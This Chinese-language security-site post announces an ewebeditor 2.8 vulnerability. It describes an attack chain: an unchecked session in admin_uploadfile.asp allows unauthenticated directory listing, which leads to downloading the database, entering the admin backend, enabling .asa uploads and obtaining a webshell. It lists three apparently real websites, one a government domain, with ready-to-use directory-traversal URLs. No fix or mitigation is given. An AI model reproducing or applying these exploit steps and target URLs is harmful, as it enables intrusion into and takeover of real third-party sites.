Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

最新漏洞利用 ewebeditor 2.8 Xday

来源: 未知 分享至:

ewebeditor 2.8漏洞最新漏洞利用:ewebeditor 2.8前几天爆出严重漏洞

由于某些修正版本对admin_uploadfile.asp文件的session没过滤好.所以造成不需要验证直接列目录,然后跟在URL中输入,查找到数据库路径 然后下载,进后台设置ASA 上传得到WEBSHELL11
 

 
http://www.eastlaborlaw.com/admin_dbh/ewebEditor_liangcai/admin_uploadfile.asp?id=&dir=../..

 
http://www.czmilan.com/xmlEditor/ewebeditor/admin_uploadfile.asp?id=&dir=../..

 
http://wujia.huizhou.gov.cn/xdocweb/webeditor/admin_uploadfile.asp?id=&dir=../..


Tags: Xday 2.8 ewebeditor
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史